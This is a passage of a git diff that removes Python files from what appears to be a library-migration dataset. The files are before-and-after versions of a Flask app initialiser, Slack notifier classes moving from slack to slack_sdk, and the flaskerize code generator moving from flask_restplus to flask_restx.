form_input_width_class="col-sm-{}".format(form_input_width), - form_input_offset_class="col-sm-offset-{}".format(form_label_width), - url_self=url_self, - now=datetime.utcnow() - ) - app.add_template_filter(render_links) - logger.debug("Jinja globals have been set", - extra={'data': {'jinja_globals': app.jinja_env.globals}}) - - backends.init_backends() - - -def load_config_file(app, config=None): - """Just load the config file, do nothing else""" - # default configuration - app.config.from_pyfile(os.path.realpath("sipa/config/default.py")) - - if config: - app.config.update(config) - - # if local config file exists, load everything into local space. - if 'SIPA_CONFIG_FILE' in os.environ: - try: - app.config.from_envvar('SIPA_CONFIG_FILE') - except IOError: - logger.warning("SIPA_CONFIG_FILE not readable: %s", - os.environ['SIPA_CONFIG_FILE']) - else: - logger.info("Successfully read config file %s", - os.environ['SIPA_CONFIG_FILE']) - else: - logger.info("No SIPA_CONFIG_FILE configured. Moving on.") - - -def init_env_and_config(app): - if not app.config['FLATPAGES_ROOT']: - app.config['FLATPAGES_ROOT'] = os.path.join( - os.path.dirname(os.path.abspath(__file__)), - '../content') - if app.config['CONTENT_URL']: - init_repo(app.config["FLATPAGES_ROOT"], app.config['CONTENT_URL']) - else: - if not os.path.isdir(app.config['FLATPAGES_ROOT']): - try: - os.mkdir(app.config['FLATPAGES_ROOT']) - except PermissionError as e: - raise RuntimeError( - "The FLATPAGES_ROOT does not exist and cannot be created." - "\nIf you are runing from inside a container using mounts," - " please create the directory at the given location" - "\n(default: `/content`," - " else: see what has been passed as configuration)." - ) from e - - if app.config['UWSGI_TIMER_ENABLED']: - try_register_uwsgi_timer(app=app) - - app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False - - if not app.config.get('SECRET_KEY'): - if not app.debug: - logger.warning('SECRET_KEY not set. Using default Key.') - app.config['SECRET_KEY'] = "yIhswxbuDCvK8a6EDGihW6xjNognxtyO85SI" - - -def try_register_uwsgi_timer(app): - """Register the uwsgi timer if uwsgi isavailable""" - try: - import uwsgi - from uwsgidecorators import timer - except ImportError: - logger.info("uwsgi package not found, uwsgi_timer hasn't been set") - else: - @timer(300) - def update_uwsgi(signum): - flatpages_root = app.config["FLATPAGES_ROOT"] - logger.debug("Updating git repository at %s", flatpages_root) - hasToReload = update_repo(flatpages_root) - if hasToReload: - logger.debug("Reloading flatpages and uwsgi", extra={'data': { - 'uwsgi.numproc': uwsgi.numproc, - 'uwsgi.opt': uwsgi.opt, - 'uwsgi.applications': uwsgi.applications, - }}) - uwsgi.reload() - - logger.debug("Registered repo update to uwsgi signal") - - -def init_logging(app): - """Initialize the app's logging mechanisms - - - Configure the sentry client, if a DSN is given - - Apply the default config dict (`defaults.DEFAULT_CONFIG`) - - If given and existent, apply the additional config file - """ - - # Configure Sentry client (raven) - if app.config['SENTRY_DSN']: - logger.debug("Sentry DSN: %s", app.config['SENTRY_DSN']) - sentry = Sentry() - sentry.init_app(app, dsn=app.config['SENTRY_DSN']) - - def register_sentry_handler(): - handler = SentryHandler() - - handler.client = app.extensions['sentry'].client - setup_logging(handler) - - return handler - else: - logger.debug("No sentry DSN specified") - - def register_sentry_handler(): - return logging.NullHandler() - - # Apply default config dict - config = replace_empty_handler_callables(DEFAULT_CONFIG, - register_sentry_handler) - logging.config.dictConfig(config) - - if app.config.get('LOG_CONFIG') is not None: - config = replace_empty_handler_callables(app.config['LOG_CONFIG'], - register_sentry_handler) - logging.config.dictConfig(config) - - logger.debug('Initialized logging', extra={'data': { - 'DEFAULT_CONFIG': DEFAULT_CONFIG, - 'EXTRA_CONFIG': app.config.get('LOG_CONFIG') - }}) diff --git a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.target.py b/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.target.py deleted file mode 100644 index 0849b23..0000000 --- a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.target.py +++ /dev/null @@ -1,212 +0,0 @@ -# -*- coding: utf-8 -*- -import logging -import logging.config -import os -import os.path -from datetime import datetime - -import sentry_sdk -from flask_babel import Babel, get_locale -from werkzeug.contrib.fixers import ProxyFix -from flask_qrcode import QRcode -from sentry_sdk.integrations.flask import FlaskIntegration - -from sipa.babel import possible_locales, save_user_locale_setting, select_locale -from sipa.base import IntegerConverter, login_manager -from sipa.blueprints.usersuite import get_attribute_endpoint -from sipa.defaults import DEFAULT_CONFIG -from sipa.flatpages import CategorizedFlatPages -from sipa.forms import render_links -from sipa.model import build_backends_ext -from sipa.model.misc import should_display_traffic_data -from sipa.session import SeparateLocaleCookieSessionInterface -from sipa.utils import replace_empty_handler_callables, url_self -from sipa.utils.babel_utils import get_weekday -from sipa.utils.git_utils import init_repo, update_repo -from sipa.utils.graph_utils import generate_traffic_chart, provide_render_function - -logger = logging.getLogger(__name__) -logger.addHandler(logging.StreamHandler()) # for before logging is configured - - -def init_app(app, **kwargs): - """Initialize the Flask app located in the module sipa. - This initializes the Flask app by: - - * calling the internal init_app() procedures of each module - * registering the Blueprints - * registering the Jinja global variables - """ - load_config_file(app, config=kwargs.pop('config', None)) - app.wsgi_app = ProxyFix(app.wsgi_app, app.config['NUM_PROXIES']) - init_logging(app) - init_env_and_config(app) - logger.debug('Initializing app') - login_manager.init_app(app) - babel = Babel() - babel.init_app(app) - babel.localeselector(select_locale) - app.before_request(save_user_locale_setting) - app.session_interface = SeparateLocaleCookieSessionInterface() - cf_pages = CategorizedFlatPages() - cf_pages.init_app(app) - backends = build_backends_ext() - backends.init_app(app) - QRcode(app) - - app.url_map.converters['int'] = IntegerConverter - - from sipa.blueprints import bp_features, bp_usersuite, \ - bp_pages, bp_documents, bp_news, bp_generic, bp_hooks, bp_register - - logger.debug('Registering blueprints') - app.register_blueprint(bp_generic) - app.register_blueprint(bp_features) - app.register_blueprint(bp_usersuite) - app.register_blueprint(bp_pages) - app.register_blueprint(bp_documents) - app.register_blueprint(bp_news) - app.register_blueprint(bp_hooks) - app.register_blueprint(bp_register) - - logger.debug('Registering Jinja globals') - form_label_width = 3 - form_input_width = 7 - app.jinja_env.globals.update( - cf_pages=cf_pages, - get_locale=get_locale, - get_weekday=get_weekday, - possible_locales=possible_locales, - get_attribute_endpoint=get_attribute_endpoint, - should_display_traffic_data=should_display_traffic_data, - traffic_chart=provide_render_function(generate_traffic_chart), - current_datasource=backends.current_datasource, - form_label_width_class="col-sm-{}".format(form_label_width), - form_input_width_class="col-sm-{}".format(form_input_width), - form_input_offset_class="col-sm-offset-{}".format(form_label_width), - url_self=url_self, - now=datetime.utcnow() - ) - app.add_template_filter(render_links) - logger.debug("Jinja globals have been set", - extra={'data': {'jinja_globals': app.jinja_env.globals}}) - - backends.init_backends() - - -def load_config_file(app, config=None): - """Just load the config file, do nothing else""" - # default configuration - app.config.from_pyfile(os.path.realpath("sipa/config/default.py")) - - if config: - app.config.update(config) - - # if local config file exists, load everything into local space. - if 'SIPA_CONFIG_FILE' in os.environ: - try: - app.config.from_envvar('SIPA_CONFIG_FILE') - except IOError: - logger.warning("SIPA_CONFIG_FILE not readable: %s", - os.environ['SIPA_CONFIG_FILE']) - else: - logger.info("Successfully read config file %s", - os.environ['SIPA_CONFIG_FILE']) - else: - logger.info("No SIPA_CONFIG_FILE configured. Moving on.") - - -def init_env_and_config(app): - if not app.config['FLATPAGES_ROOT']: - app.config['FLATPAGES_ROOT'] = os.path.join( - os.path.dirname(os.path.abspath(__file__)), - '../content') - if app.config['CONTENT_URL']: - init_repo(app.config["FLATPAGES_ROOT"], app.config['CONTENT_URL']) - else: - if not os.path.isdir(app.config['FLATPAGES_ROOT']): - try: - os.mkdir(app.config['FLATPAGES_ROOT']) - except PermissionError as e: - raise RuntimeError( - "The FLATPAGES_ROOT does not exist and cannot be created." - "\nIf you are runing from inside a container using mounts," - " please create the directory at the given location" - "\n(default: `/content`," - " else: see what has been passed as configuration)." - ) from e - - if app.config['UWSGI_TIMER_ENABLED']: - try_register_uwsgi_timer(app=app) - - app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False - - if not app.config.get('SECRET_KEY'): - if not app.debug: - logger.warning('SECRET_KEY not set. Using default Key.') - app.config['SECRET_KEY'] = "yIhswxbuDCvK8a6EDGihW6xjNognxtyO85SI" - - -def try_register_uwsgi_timer(app): - """Register the uwsgi timer if uwsgi isavailable""" - try: - import uwsgi - from uwsgidecorators import timer - except ImportError: - logger.info("uwsgi package not found, uwsgi_timer hasn't been set") - else: - @timer(300) - def update_uwsgi(signum): - flatpages_root = app.config["FLATPAGES_ROOT"] - logger.debug("Updating git repository at %s", flatpages_root) - hasToReload = update_repo(flatpages_root) - if hasToReload: - logger.debug("Reloading flatpages and uwsgi", extra={'data': { - 'uwsgi.numproc': uwsgi.numproc, - 'uwsgi.opt': uwsgi.opt, - 'uwsgi.applications': uwsgi.applications, - }}) - uwsgi.reload() - - logger.debug("Registered repo update to uwsgi signal") - - -def init_logging(app): - """Initialize the app's logging mechanisms - - - Configure the sentry client, if a DSN is given - - Apply the default config dict (`defaults.DEFAULT_CONFIG`) - - If given and existent, apply the additional config file - """ - - # TODO simplify this, by a lot. - - if not (dsn := app.config['SENTRY_DSN']): - logger.debug("No sentry DSN specified") - # Configure Sentry SDK - else: - logger.debug("Sentry DSN: %s", dsn) - sentry_sdk.init( - dsn=dsn, - integrations=[FlaskIntegration()], - traces_sample_rate = 1.0, - # release="myapp@1.0.0", - ) - - def register_sentry_handler(): - return logging.NullHandler() - - # Apply default config dict - config = replace_empty_handler_callables(DEFAULT_CONFIG, - register_sentry_handler) - logging.config.dictConfig(config) - - if app.config.get('LOG_CONFIG') is not None: - config = replace_empty_handler_callables(app.config['LOG_CONFIG'], - register_sentry_handler) - logging.config.dictConfig(config) - - logger.debug('Initialized logging', extra={'data': { - 'DEFAULT_CONFIG': DEFAULT_CONFIG, - 'EXTRA_CONFIG': app.config.get('LOG_CONFIG') - }}) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.diff b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.diff deleted file mode 100644 index 5dc0c8e..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.diff +++ /dev/null @@ -1,65 +0,0 @@ -diff --git a/petisco/extra/slack/application/notifier/slack_notifier.py b/petisco/extra/slack/application/notifier/slack_notifier.py - index 9e680d2d654faaffa1e233f911f77a7c0b779b0e..9abf7b1f6ef8c55bdddcb9a5c2eff513f6a93130 100644 - --- a/petisco/extra/slack/application/notifier/slack_notifier.py - +++ b/petisco/extra/slack/application/notifier/slack_notifier.py -@@ -1,15 +1,21 @@ - from typing import Optional - --from slack import WebClient --from slack.errors import SlackApiError -+from slack_sdk import WebClient -+from slack_sdk.errors import SlackApiError - - from petisco.base.application.notifier.notifier import Notifier -+from petisco.base.application.notifier.notifier_exception_message import ( -+ NotifierExceptionMessage, -+) - from petisco.base.application.notifier.notifier_message import NotifierMessage - from petisco.base.domain.errors.domain_error import DomainError - from petisco.extra.slack.application.notifier.blocks_slack_notifier_message_converter import ( - BlocksSlackNotifierMessageConverter, - SlackNotifierMessageConverter, - ) -+from petisco.extra.slack.application.notifier.exception_blocks_slack_notifier_message_converter import ( -+ ExceptionBlocksSlackNotifierMessageConverter, -+) - - - class SlackError(DomainError): -@@ -24,19 +30,31 @@ class SlackNotifier(Notifier): - converter: Optional[ - SlackNotifierMessageConverter - ] = BlocksSlackNotifierMessageConverter(), -+ exception_converter: Optional[ -+ SlackNotifierMessageConverter -+ ] = ExceptionBlocksSlackNotifierMessageConverter(), - ): -- self.token = token - self.channel = channel - self.converter = converter -+ self.exception_converter = exception_converter -+ self.client = WebClient(token=token) - - def publish(self, notifier_message: NotifierMessage): -+ try: -+ self.client.chat_postMessage( -+ channel=self.channel, -+ blocks=self.converter.convert(notifier_message), -+ text=notifier_message.title, -+ ) -+ except SlackApiError as e: -+ raise SlackError(e.response["error"]) - -- client = WebClient(token=self.token) -- -+ def publish_exception(self, notifier_exception_message: NotifierExceptionMessage): - try: -- client.chat_postMessage( -+ self.client.chat_postMessage( - channel=self.channel, -- blocks=self.converter.convert(notifier_message=notifier_message), -+ blocks=self.exception_converter.convert(notifier_exception_message), -+ text=notifier_exception_message.title, - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.source.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.source.py deleted file mode 100644 index c41829c..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.source.py +++ /dev/null @@ -1,42 +0,0 @@ -from typing import Optional - -from slack import WebClient -from slack.errors import SlackApiError - -from petisco.base.application.notifier.notifier import Notifier -from petisco.base.application.notifier.notifier_message import NotifierMessage -from petisco.base.domain.errors.domain_error import DomainError -from petisco.extra.slack.application.notifier.blocks_slack_notifier_message_converter import ( - BlocksSlackNotifierMessageConverter, - SlackNotifierMessageConverter, -) - - -class SlackError(DomainError): - pass - - -class SlackNotifier(Notifier): - def __init__( - self, - token: str, - channel: str, - converter: Optional[ - SlackNotifierMessageConverter - ] = BlocksSlackNotifierMessageConverter(), - ): - self.token = token - self.channel = channel - self.converter = converter - - def publish(self, notifier_message: NotifierMessage): - - client = WebClient(token=self.token) - - try: - client.chat_postMessage( - channel=self.channel, - blocks=self.converter.convert(notifier_message=notifier_message), - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.target.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.target.py deleted file mode 100644 index d58a1be..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.target.py +++ /dev/null @@ -1,60 +0,0 @@ -from typing import Optional - -from slack_sdk import WebClient -from slack_sdk.errors import SlackApiError - -from petisco.base.application.notifier.notifier import Notifier -from petisco.base.application.notifier.notifier_exception_message import ( - NotifierExceptionMessage, -) -from petisco.base.application.notifier.notifier_message import NotifierMessage -from petisco.base.domain.errors.domain_error import DomainError -from petisco.extra.slack.application.notifier.blocks_slack_notifier_message_converter import ( - BlocksSlackNotifierMessageConverter, - SlackNotifierMessageConverter, -) -from petisco.extra.slack.application.notifier.exception_blocks_slack_notifier_message_converter import ( - ExceptionBlocksSlackNotifierMessageConverter, -) - - -class SlackError(DomainError): - pass - - -class SlackNotifier(Notifier): - def __init__( - self, - token: str, - channel: str, - converter: Optional[ - SlackNotifierMessageConverter - ] = BlocksSlackNotifierMessageConverter(), - exception_converter: Optional[ - SlackNotifierMessageConverter - ] = ExceptionBlocksSlackNotifierMessageConverter(), - ): - self.channel = channel - self.converter = converter - self.exception_converter = exception_converter - self.client = WebClient(token=token) - - def publish(self, notifier_message: NotifierMessage): - try: - self.client.chat_postMessage( - channel=self.channel, - blocks=self.converter.convert(notifier_message), - text=notifier_message.title, - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) - - def publish_exception(self, notifier_exception_message: NotifierExceptionMessage): - try: - self.client.chat_postMessage( - channel=self.channel, - blocks=self.exception_converter.convert(notifier_exception_message), - text=notifier_exception_message.title, - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.diff b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.diff deleted file mode 100644 index b83ebd6..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.diff +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/petisco/extra/slack/is_slack_available.py b/petisco/extra/slack/is_slack_available.py - index 9e680d2d654faaffa1e233f911f77a7c0b779b0e..9abf7b1f6ef8c55bdddcb9a5c2eff513f6a93130 100644 - --- a/petisco/extra/slack/is_slack_available.py - +++ b/petisco/extra/slack/is_slack_available.py -@@ -1,6 +1,6 @@ - def is_slack_available() -> bool: - try: -- import slack # noqa -+ import slack_sdk # noqa - except (RuntimeError, ImportError): - return False - return True diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.source.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.source.py deleted file mode 100644 index c932bbb..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.source.py +++ /dev/null @@ -1,6 +0,0 @@ -def is_slack_available() -> bool: - try: - import slack # noqa - except (RuntimeError, ImportError): - return False - return True diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.target.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.target.py deleted file mode 100644 index e8ceac7..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.target.py +++ /dev/null @@ -1,6 +0,0 @@ -def is_slack_available() -> bool: - try: - import slack_sdk # noqa - except (RuntimeError, ImportError): - return False - return True diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.diff b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.diff deleted file mode 100644 index f8c5ba3..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.diff +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/petisco/legacy/notifier/infrastructure/slack/slack_notifier.py b/petisco/legacy/notifier/infrastructure/slack/slack_notifier.py - index 9e680d2d654faaffa1e233f911f77a7c0b779b0e..9abf7b1f6ef8c55bdddcb9a5c2eff513f6a93130 100644 - --- a/petisco/legacy/notifier/infrastructure/slack/slack_notifier.py - +++ b/petisco/legacy/notifier/infrastructure/slack/slack_notifier.py -@@ -1,5 +1,5 @@ --from slack import WebClient --from slack.errors import SlackApiError -+from slack_sdk import WebClient -+from slack_sdk.errors import SlackApiError - - from petisco.legacy.notifier.domain.interface_notifier import INotifier - from petisco.legacy.notifier.domain.notifier_message import NotifierMessage diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.source.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.source.py deleted file mode 100644 index efb2a26..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.source.py +++ /dev/null @@ -1,36 +0,0 @@ -from slack import WebClient -from slack.errors import SlackApiError - -from petisco.legacy.notifier.domain.interface_notifier import INotifier -from petisco.legacy.notifier.domain.notifier_message import NotifierMessage -from petisco.legacy.notifier.infrastructure.slack.errors import SlackError -from petisco.legacy.notifier.infrastructure.slack.interface_slack_notifier_message_converter import ( - ISlackNotifierMessageConverter, -) -from petisco.legacy.notifier.infrastructure.slack.slack_notifier_message_converter import ( - SlackNotifierMessageConverter, -) - - -class SlackNotifier(INotifier): - def __init__( - self, - token: str, - channel: str, - converter: ISlackNotifierMessageConverter = SlackNotifierMessageConverter(), - ): - self.token = token - self.channel = channel - self.converter = converter - - def publish(self, notifier_message: NotifierMessage): - - client = WebClient(token=self.token) - - try: - client.chat_postMessage( - channel=self.channel, - blocks=self.converter.convert(notifier_message=notifier_message), - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.target.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.target.py deleted file mode 100644 index c9b74d8..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.target.py +++ /dev/null @@ -1,36 +0,0 @@ -from slack_sdk import WebClient -from slack_sdk.errors import SlackApiError - -from petisco.legacy.notifier.domain.interface_notifier import INotifier -from petisco.legacy.notifier.domain.notifier_message import NotifierMessage -from petisco.legacy.notifier.infrastructure.slack.errors import SlackError -from petisco.legacy.notifier.infrastructure.slack.interface_slack_notifier_message_converter import ( - ISlackNotifierMessageConverter, -) -from petisco.legacy.notifier.infrastructure.slack.slack_notifier_message_converter import ( - SlackNotifierMessageConverter, -) - - -class SlackNotifier(INotifier): - def __init__( - self, - token: str, - channel: str, - converter: ISlackNotifierMessageConverter = SlackNotifierMessageConverter(), - ): - self.token = token - self.channel = channel - self.converter = converter - - def publish(self, notifier_message: NotifierMessage): - - client = WebClient(token=self.token) - - try: - client.chat_postMessage( - channel=self.channel, - blocks=self.converter.convert(notifier_message=notifier_message), - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.diff b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.diff deleted file mode 100644 index 7fc2b06..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/flaskerize/generate.py b/flaskerize/generate.py - index ab2ea26e8a6180adc43c43e24f5ecb3ad3708e89..59d8319355bf95f26949fe13ac3d6be5b5282fb6 100644 - --- a/flaskerize/generate.py - +++ b/flaskerize/generate.py -@@ -149,7 +149,7 @@ def namespace(args): - """ - - CONTENTS = f"""from flask import request, jsonify --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - from flask_accepts import accepts, responds - import marshmallow as ma - diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.source.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.source.py deleted file mode 100644 index ae88961..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.source.py +++ /dev/null @@ -1,302 +0,0 @@ -from typing import Callable, Dict - -HEADER = """# DO NOT EDIT THIS FILE. It is generated by flaskerize and may be -# overwritten""" - - -def _generate( - contents, - output_name: str, - filename: str = None, - mode: str = "w", - dry_run: bool = False, -) -> None: - if dry_run: - print(contents) - else: - if filename is None: - filename = f'{output_name.replace(".py", "")}.py' - with open(filename, mode) as fid: - fid.write(contents) - - if filename: - print(f"Successfully created {filename}") - - -def hello_world(args) -> None: - print("Generating a hello_world app") - - CONTENTS = f"""{HEADER} - -import os -from flask import Flask, send_from_directory - -def create_app(): - app = Flask(__name__) - - # Serve React App - @app.route('/') - def serve(): - return 'Hello, Flaskerize!' - return app - -if __name__ == '__main__': - app = create_app() - app.run() - - """ - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new app") - - -def app_from_dir(args) -> None: - """ - Serve files using `send_from_directory`. Note this is less secure than - from_static_files as anything within the directory can be served. - """ - - print("Generating an app from static site directory") - - # The routing for `send_from_directory` comes directly from https://stackoverflow.com/questions/44209978/serving-a-create-react-app-with-flask # noqa - CONTENTS = f"""{HEADER} - -import os -from flask import Flask, send_from_directory - - -def create_app(): - app = Flask(__name__, static_folder='{args.source}') - - # Serve static site - @app.route('/') - def index(): - return send_from_directory(app.static_folder, 'index.html') - - return app - -if __name__ == '__main__': - app = create_app() - app.run() - -""" - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new app") - - -def blueprint(args): - """ - Static site blueprint - """ - - print("Generating a blueprint from static site") - - # The routing for `send_from_directory` comes directly from https://stackoverflow.com/questions/44209978/serving-a-create-react-app-with-flask # noqa - CONTENTS = f"""{HEADER} - -import os -from flask import Blueprint, send_from_directory - -site = Blueprint('site', __name__, static_folder='{args.source}') - -# Serve static site -@site.route('/') -def index(): - return send_from_directory(site.static_folder, 'index.html') - -""" - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new blueprint") - - -def wsgi(args): - from flaskerize.utils import split_file_factory - - filename, func = split_file_factory(args.source) - filename = filename.replace(".py", "") - - CONTENTS = f"""{HEADER} - -from {filename} import {func} -app = {func}() - """ - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new wsgi") - - -def namespace(args): - """ - Generate a new Flask-RESTplus API Namespace - """ - - CONTENTS = f"""from flask import request, jsonify -from flask_restplus import Namespace, Resource -from flask_accepts import accepts, responds -import marshmallow as ma - -api = Namespace('{args.output_name}', description='All things {args.output_name}') - - -class {args.output_name.title()}: - '''A super awesome {args.output_name}''' - - def __init__(self, id: int, a_float: float = 42.0, description: str = ''): - self.id = id - self.a_float = a_float - self.description = description - - -class {args.output_name.title()}Schema(ma.Schema): - id = ma.fields.Integer() - a_float = ma.fields.Float() - description = ma.fields.String(256) - - @ma.post_load - def make(self, kwargs): - return {args.output_name.title()}(**kwargs) - - -@api.route('/') -class {args.output_name.title()}Resource(Resource): - @accepts(schema={args.output_name.title()}Schema, api=api) - @responds(schema={args.output_name.title()}Schema) - def post(self): - return request.parsed_obj - - @accepts(dict(name='id', type=int, help='ID of the {args.output_name.title()}'), api=api) - @responds(schema={args.output_name.title()}Schema) - def get(self): - return {args.output_name.title()}(id=request.parsed_args['id']) - - @accepts(schema={args.output_name.title()}Schema, api=api) - @responds(schema={args.output_name.title()}Schema) - def update(self, id, data): - pass - - @accepts(dict(name='id', type=int, help='ID of the {args.output_name.title()}'), api=api) - def delete(self, id): - pass - -""" - print(args) - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - - if not args.without_test: - namespace_test(args) - - -def namespace_test(args): - """ - Generate a new Flask-RESTplus API Namespace - """ - - CONTENTS = f"""import pytest - -from app.test.fixtures import app, client -from .{args.output_name} import {args.output_name.title()}, {args.output_name.title()}Schema - - -@pytest.fixture -def schema(): - return {args.output_name.title()}Schema() - - -def test_schema_valid(schema): # noqa - assert schema - - -def test_post(app, client, schema): # noqa - with client: - obj = {args.output_name.title()}(id=42) - resp = client.post('{args.output_name}/', json=schema.dump(obj).data) - rv = schema.load(resp.json).data - assert obj.id == rv.id - - -def test_get(app, client, schema): # noqa - with client: - resp = client.get('{args.output_name}/?id=42') - rv = schema.load(resp.json).data - assert rv - assert rv.id == 42 - -""" - print(args) - _generate( - CONTENTS, - output_name=args.output_name - and args.output_name.replace(".py", "") + "_test.py", - filename=args.output_file and args.output_file.replace(".py", "") + "_test.py", - dry_run=args.dry_run, - ) - - -def dockerfile(args): - import os - - CONTENTS = f"""FROM python:3.7 as base - -FROM base as builder -RUN mkdir /install -WORKDIR /install -RUN pip install --install-option="--prefix=/install" gunicorn -RUN pip install --install-option="--prefix=/install" flask - -FROM base -COPY --from=builder /install /usr/local -COPY . /app -WORKDIR /app - -EXPOSE 8080 -ENTRYPOINT ["gunicorn", "--bind", "0.0.0.0:8080", "--access-logfile", "-", "--error-logfile", "-", "{args.source}"] - -""" - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new Dockerfile") - print( - "Next, run `docker build -t my_app_image .` to build the docker image and " - "then use `docker run my_app_image -p 127.0.0.1:80:8080` to launch" - ) - - -# Mapping of keywords to generation functions -a: Dict[str, Callable] = { - "hello-world": hello_world, - "hw": hello_world, - "dockerfile": dockerfile, - "wsgi": wsgi, - "app_from_dir": app_from_dir, - "blueprint": blueprint, - "bp": blueprint, - "namespace": namespace, - "ns": namespace, -} diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.target.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.target.py deleted file mode 100644 index ce737e1..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.target.py +++ /dev/null @@ -1,302 +0,0 @@ -from typing import Callable, Dict - -HEADER = """# DO NOT EDIT THIS FILE. It is generated by flaskerize and may be -# overwritten""" - - -def _generate( - contents, - output_name: str, - filename: str = None, - mode: str = "w", - dry_run: bool = False, -) -> None: - if dry_run: - print(contents) - else: - if filename is None: - filename = f'{output_name.replace(".py", "")}.py' - with open(filename, mode) as fid: - fid.write(contents) - - if filename: - print(f"Successfully created {filename}") - - -def hello_world(args) -> None: - print("Generating a hello_world app") - - CONTENTS = f"""{HEADER} - -import os -from flask import Flask, send_from_directory - -def create_app(): - app = Flask(__name__) - - # Serve React App - @app.route('/') - def serve(): - return 'Hello, Flaskerize!' - return app - -if __name__ == '__main__': - app = create_app() - app.run() - - """ - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new app") - - -def app_from_dir(args) -> None: - """ - Serve files using `send_from_directory`. Note this is less secure than - from_static_files as anything within the directory can be served. - """ - - print("Generating an app from static site directory") - - # The routing for `send_from_directory` comes directly from https://stackoverflow.com/questions/44209978/serving-a-create-react-app-with-flask # noqa - CONTENTS = f"""{HEADER} - -import os -from flask import Flask, send_from_directory - - -def create_app(): - app = Flask(__name__, static_folder='{args.source}') - - # Serve static site - @app.route('/') - def index(): - return send_from_directory(app.static_folder, 'index.html') - - return app - -if __name__ == '__main__': - app = create_app() - app.run() - -""" - _generate( - CONTENTS, - output_name=args.output_name, - 